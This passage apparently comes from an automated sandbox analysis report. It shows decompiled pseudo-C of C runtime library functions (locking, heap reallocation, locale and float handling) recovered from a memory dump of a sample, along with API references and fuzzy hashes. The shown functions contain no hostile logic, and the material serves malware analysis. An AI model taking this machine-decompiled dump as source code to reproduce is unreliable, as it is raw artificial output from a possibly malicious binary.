								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x2f6100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -3098684
											E002E40A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E002E3B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E002E2445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x2f50e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E002E4869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x2f4848[_t149] = _t138;
							 *0x2f50e4 =  *0x2f50e4 + _t141;
							__eflags =  *0x2f50e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0x2f4848[_t149];
								if(_t138 >= 0x800 + 0x2f4848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x2f50e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x2f4848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E002E40A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E002E2600(_t155, 0x2f3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}

0x002e38a8
0x002e38aa
0x002e38af
0x002e38b6
0x002e38be
0x002e38c1
0x002e38c5
0x002e38c6
0x002e38c7
0x002e38ce
0x002e38d0
0x002e38d5
0x002e38f2
0x002e38f7
0x002e38fd
0x002e3902
0x002e3904
0x00000000
0x00000000
0x002e3906
0x002e390c
0x002e390f
0x002e3912
0x002e391b
0x002e391e
0x002e3924
0x002e3927
0x002e392a
0x002e392d
0x002e3930
0x002e3930
0x002e393b
0x002e3941
0x002e3946
0x002e3a7b
0x002e3a7d
0x002e3a7e
0x002e3a7e
0x002e3a7e
0x002e3a80
0x002e3a80
0x002e3a83
0x002e3a86
0x00000000
0x00000000
0x002e3a91
0x002e3a97
0x002e3a9a
0x002e3a9d
0x002e3ab1
0x002e3ab1
0x002e3ab5
0x002e3ab7
0x002e3abe
0x002e3ac3
0x002e3ac5
0x002e3ac5
0x002e3ab9
0x002e3abb
0x002e3abb
0x002e3ac9
0x002e3acf
0x002e3ad2
0x002e3ad5
0x002e3b23
0x002e3b29
0x002e3b2c
0x002e3b2e
0x002e3b33
0x002e3b35
0x002e3b3a
0x002e3b3a
0x00000000
0x002e3ad7
0x002e3ad7
0x002e3ad9
0x00000000
0x00000000
0x002e3adc
0x002e3ae2
0x002e3ae4
0x00000000
0x00000000
0x002e3ae9
0x002e3aeb
0x002e3af0
0x002e3af3
0x002e3afd
0x002e3b00
0x002e3b0b
0x002e3b12
0x002e3b16
0x002e3b1b
0x002e3b1e
0x002e3b3d
0x002e3b3d
0x00000000
0x002e3b3d
0x002e3b06
0x002e3b06
0x002e3b08
0x002e3b08
0x00000000
0x002e3b08
0x002e3af9
0x00000000
0x002e3af9
0x002e3ad5
0x002e3a9f
0x002e3aa1
0x00000000
0x00000000
0x002e3aa9
0x00000000
0x002e3aa9
0x002e3b43
0x002e3b46
0x002e3b4b
0x002e3b4b
0x002e3b4d
0x002e3b52
0x002e3b52
0x002e394c
0x002e394f
0x002e3951
0x00000000
0x00000000
0x002e3957
0x002e3959
0x002e395c
0x002e395f
0x002e3964
0x002e396c
0x002e396e
0x002e3970
0x002e3972
0x002e3972
0x002e3977
0x002e3977
0x002e3978
0x002e397b
0x002e397b
0x002e3981
0x00000000
0x00000000
0x002e398d
0x002e398f
0x002e3992
0x002e3994
0x002e3a2e
0x002e3a35
0x002e3a35
0x002e3a3b
0x002e3a47
0x002e3a49
0x00000000
0x00000000
0x002e3a4b
0x002e3a51
0x002e3a54
0x002e3a57
0x002e3a5b
0x002e3a61
0x002e3a64
0x002e3a67
0x002e3a6a
0x002e3a6a
0x002e3a6f
0x002e3a70
0x002e3a73
0x00000000
0x002e3a73
0x002e399a
0x002e39a0
0x00000000
0x002e39a0
0x002e39a3
0x002e39a5
0x002e39aa
0x002e39ab
0x002e39ae
0x002e39b1
0x002e39b1
0x002e39b3
0x00000000
0x00000000
0x002e39b9
0x002e39bb
0x002e39be
0x002e3a1b
0x002e3a1b
0x002e3a1c
0x002e3a22
0x002e3a23
0x002e3a26
0x002e3a29
0x00000000
0x002e3a29
0x002e39c0
0x002e39c2
0x00000000
0x00000000
0x002e39c4
0x002e39c6
0x002e39c8
0x00000000
0x00000000
0x002e39ca
0x002e39cc
0x002e39dc
0x002e39e9
0x002e39f0
0x002e39f5
0x002e39fc
0x002e3a06
0x002e3a0a
0x002e3a0f
0x002e3a12
0x002e3a12
0x002e3a12
0x002e3a15
0x002e3a18
0x002e3a18
0x00000000
0x002e3a18
0x002e39cf
0x002e39d5
0x002e39d8
0x002e39da
0x00000000
0x00000000
0x00000000
0x002e39da
0x00000000
0x002e39b1
0x002e38ea
0x00000000

APIs

__lock.LIBCMT ref: 002E38B6

Part of subcall function 002E442F: __mtinitlocknum.LIBCMT ref: 002E4441
Part of subcall function 002E442F: EnterCriticalSection.KERNEL32(00000000,?,002E37AB,0000000D), ref: 002E445A

__calloc_crt.LIBCMT ref: 002E38C7

Part of subcall function 002E4869: __calloc_impl.LIBCMT ref: 002E4878

@_EH4_CallFilterFunc@8.LIBCMT ref: 002E38E2
GetStartupInfoW.KERNEL32(?,002F2260,00000064,002E1654,002F2190,00000014), ref: 002E393B
__calloc_crt.LIBCMT ref: 002E3986
GetFileType.KERNEL32(00000001), ref: 002E39CF

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2772871689-0
Opcode ID: b7755770e37b0876989e74e251f059eb9aa4baea6c393b94614c45bf20d225c9
Instruction ID: a7dad21f6c9170e6219eb00469ee690657e384d278d3e163592ec4732c201612
Opcode Fuzzy Hash: b7755770e37b0876989e74e251f059eb9aa4baea6c393b94614c45bf20d225c9
Instruction Fuzzy Hash: 398128719643868FCB10CF6AD8885ADBBF0AF09325FA4427DD0A6AB3D1C7749952CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002E3815 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E002E3815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E002E1890(_t3);
				if(E002E4560() != 0) {
					_t6 = E002E4001(E002E35A6);
					 *0x2f350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E002E4869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E002E388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E002E405D( *0x2f350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E002E3762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E002E388B();
					return 0;
				}
			}

0x002e3815
0x002e3821
0x002e3830
0x002e3835
0x002e383b
0x002e383e
0x00000000
0x002e3840
0x002e384d
0x002e3851
0x002e3853
0x002e3882
0x002e3882
0x002e3887
0x002e388a
0x002e3855
0x002e3863
0x002e3865
0x00000000
0x002e3867
0x002e3867
0x002e3869
0x002e386a
0x002e3871
0x002e3877
0x002e387b
0x002e387f
0x002e3881
0x002e3881
0x002e3865
0x002e3853
0x002e3823
0x002e3823
0x002e3823
0x002e382a
0x002e382a

APIs

__init_pointers.LIBCMT ref: 002E3815

Part of subcall function 002E1890: RtlEncodePointer.NTDLL(00000000,?,002E381A,002E163A,002F2190,00000014), ref: 002E1893
Part of subcall function 002E1890: __initp_misc_winsig.LIBCMT ref: 002E18AE
Part of subcall function 002E1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002E4117
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002E412B
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002E413E
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002E4151
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002E4164
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002E4177
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002E418A
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002E419D
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002E41B0
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002E41C3
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002E41D6
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002E41E9
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002E41FC
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002E420F
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002E4222
Part of subcall function 002E1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002E4235

__mtinitlocks.LIBCMT ref: 002E381A
__mtterm.LIBCMT ref: 002E3823

Part of subcall function 002E388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002E3828,002E163A,002F2190,00000014), ref: 002E447A
Part of subcall function 002E388B: _free.LIBCMT ref: 002E4481
Part of subcall function 002E388B: DeleteCriticalSection.KERNEL32(XK/,?,?,002E3828,002E163A,002F2190,00000014), ref: 002E44A3

__calloc_crt.LIBCMT ref: 002E3848
__initptd.LIBCMT ref: 002E386A
GetCurrentThreadId.KERNEL32 ref: 002E3871

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 11508f3cd49aff84df6365a2c67dc1844659fcf2c16c25d264f0d0840c582bfa
Instruction ID: bf84f721c7955ea1ad355a4e8517c30edcdb62bdfeea8a3d9a469144d1b6c757
Opcode Fuzzy Hash: 11508f3cd49aff84df6365a2c67dc1844659fcf2c16c25d264f0d0840c582bfa
Instruction Fuzzy Hash: DFF0C2721F82D259E228FA7B7C0A65A26848F42B71FE0463EF4149A0D2EB218A614990

Uniqueness

Uniqueness Score: -1.00%

Function 002E91C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E002E91C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E002E4BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E002E917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E002E1CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x002e91ce
0x002e91d3
0x002e91ed
0x00000000
0x002e91ed
0x002e91d5
0x002e91da
0x00000000
0x00000000
0x002e91df
0x002e91fc
0x002e9201
0x002e9204
0x002e920b
0x002e922a
0x002e9231
0x002e9233
0x002e9277
0x002e9283
0x002e9286
0x002e928b
0x002e928e
0x002e9294
0x002e9296
0x002e92a6
0x002e92a6
0x002e92aa
0x002e92ac
0x002e92af
0x002e92af
0x002e92af
0x002e92af
0x00000000
0x002e92b5
0x002e9298
0x002e9298
0x002e929d
0x002e929d
0x002e92a0
0x00000000
0x002e92a0
0x002e9235
0x002e9238
0x002e923c
0x002e9265
0x002e9265
0x002e9265
0x002e9268
0x002e9268
0x00000000
0x00000000
0x002e926a
0x002e926e
0x00000000
0x00000000
0x002e9270
0x002e9270
0x002e9270
0x00000000
0x002e9270
0x002e923e
0x002e923e
0x002e9241
0x00000000
0x00000000
0x002e9245
0x002e924f
0x002e9255
0x002e9258
0x002e925e
0x002e9261
0x002e9263
0x00000000
0x00000000
0x00000000
0x002e9263
0x002e920d
0x002e9210
0x002e9212
0x002e9217
0x002e9217
0x002e921c
0x00000000
0x002e921c
0x002e91e1
0x002e91e6
0x002e91ea
0x002e91ea
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E91FC
__isleadbyte_l.LIBCMT ref: 002E922A
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 002E9258
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 002E928E

Strings

8a., xrefs: 002E91C6

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: 8a.
API String ID: 3058430110-1963538963
Opcode ID: cf40efd99c17fcf527c63efdeeb14b0b808356da5f357ab414742cc023dd365b
Instruction ID: f5b20c9740967dbce8f833511fbbaa9d6ba780d29583f217b3ad6d92809fe537
Opcode Fuzzy Hash: cf40efd99c17fcf527c63efdeeb14b0b808356da5f357ab414742cc023dd365b
Instruction Fuzzy Hash: 1331D431590287BFDF218F76CC48BAA7BB9FF41310F55411AE9189B1A0D771D9A0DB50

Uniqueness

Uniqueness Score: -1.00%

Function 002E7452 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E002E7452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x2f4834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x2f4830 == _t7) {
									_t9 = E002E1CC3();
									 *_t9 = E002E1CD6(GetLastError());
									goto L17;
								} else {
									if(E002E1741(_t7, _t31) == 0) {
										_t12 = E002E1CC3();
										 *_t12 = E002E1CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E002E1741(_t6, _t31);
						 *((intOrPtr*)(E002E1CC3())) = 0xc;
						goto L12;
					} else {
						E002E4831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E002E1149(__ebx, __edx, __edi, _a8);
				}
			}

0x002e7459
0x002e7467
0x002e746c
0x002e747b
0x002e74ae
0x002e7480
0x002e7482
0x002e7482
0x002e748f
0x002e7495
0x002e7499
0x002e74f9
0x002e74f9
0x002e749b
0x002e74a1
0x002e74e3
0x002e74f7
0x00000000
0x002e74a3
0x002e74ac
0x002e74cb
0x002e74df
0x002e74c5
0x002e74c5
0x00000000
0x00000000
0x00000000
0x002e74ac
0x002e74a1
0x00000000
0x002e74c7
0x002e74b4
0x002e74bf
0x00000000
0x002e746e
0x002e7471
0x002e7477
0x002e7477
0x002e74c8
0x002e74ca
0x002e745b
0x002e7465
0x002e7465

APIs

_malloc.LIBCMT ref: 002E745E

Part of subcall function 002E1149: __FF_MSGBANNER.LIBCMT ref: 002E1160
Part of subcall function 002E1149: __NMSG_WRITE.LIBCMT ref: 002E1167
Part of subcall function 002E1149: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,00000000,00000000,?,002E48C7,00000000,00000000,00000000,00000000,?,002E44F9,00000018,002F2280), ref: 002E118C

_free.LIBCMT ref: 002E7471

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8f846508ade2cf414f3cf3a194b0381ddbad9ead8115f0819d187d08aa691daa
Instruction ID: df1fd83d666b4ebe84eaff4dd8dcf996f29a8fbbe6628af6fd50e09ee781fb0f
Opcode Fuzzy Hash: 8f846508ade2cf414f3cf3a194b0381ddbad9ead8115f0819d187d08aa691daa
Instruction Fuzzy Hash: B811AB318F96965BDB213F77FC456693FE46F10360BA04535F948DA1D0DB708870CA91

Uniqueness

Uniqueness Score: -1.00%

Function 002E8BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E002E8BC0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0x2f24b0);
				_t4 = E002E2400(__ebx, __edi, __esi);
				_t17 =  *0x2f3d3c - 0x2f3d40; // 0x2f3d40
				if(_t17 != 0) {
					E002E442F(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0x2f3d3c = E002E73D6("@=/", 0x2f3d40);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E002E8C09();
				}
				return E002E2445(_t4);
			}

0x002e8bc0
0x002e8bc2
0x002e8bc7
0x002e8bd1
0x002e8bd7
0x002e8bdb
0x002e8be1
0x002e8bf2
0x002e8bf7
0x002e8bfe
0x002e8bfe
0x002e8c08

APIs

__lock.LIBCMT ref: 002E8BDB

Part of subcall function 002E442F: __mtinitlocknum.LIBCMT ref: 002E4441
Part of subcall function 002E442F: EnterCriticalSection.KERNEL32(00000000,?,002E37AB,0000000D), ref: 002E445A

__updatetlocinfoEx_nolock.LIBCMT ref: 002E8BEB

Part of subcall function 002E73D6: ___addlocaleref.LIBCMT ref: 002E73F2
Part of subcall function 002E73D6: ___removelocaleref.LIBCMT ref: 002E73FD
Part of subcall function 002E73D6: ___freetlocinfo.LIBCMT ref: 002E7411

Strings

@=/, xrefs: 002E8BCC
@=/, xrefs: 002E8BD1, 002E8BE6, 002E8BF2

Memory Dump Source

Source File: 00000001.00000002.233540686.00000000002E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000001.00000002.233535949.00000000002E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233556716.00000000002F3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.233561593.00000000002F7000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e0000_miylwnpd.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: @=/$@=/
API String ID: 547918592-3168913135
Opcode ID: fbca8b347c81b6d86aca1c6fa6d37dc7ed6f93ef9f30a0b1cf3b1fabfd045f95
Instruction ID: e8ab3e73d545a7af9ecb7cee6a16716507f5769d25928c0ecfd5639ab5a2703e
Opcode Fuzzy Hash: fbca8b347c81b6d86aca1c6fa6d37dc7ed6f93ef9f30a0b1cf3b1fabfd045f95
Instruction Fuzzy Hash: 1EE0CD315F1384D5D614FB727807B5CB2609B027F1FF06167F148561D1CEF44A648E26

Uniqueness

Uniqueness Score: -1.00%

Function 002EA94D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E002EA94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E002EAE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E002EA9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E002EB119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E002EB058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x002ea950
0x002ea956
0x002ea9c9
0x00000000
0x002ea95d
0x002ea95d
0x002ea960
0x002ea97b
0x002ea97e
0x002ea99e
0x002ea9b0
0x002ea980
0x002ea980
0x002ea983
0x00000000
0x002ea985
0x002ea997
0x002ea997
0x002ea983
0x002ea9ce
0x002ea9d2
0x002ea962
0x002ea97a
0x002ea97a
0x002ea960

APIs

__cftof_l.LIBCMT ref: 002EA971

Part of subcall function 002EB058: __fltout2.LIBCMT ref: 002EB081

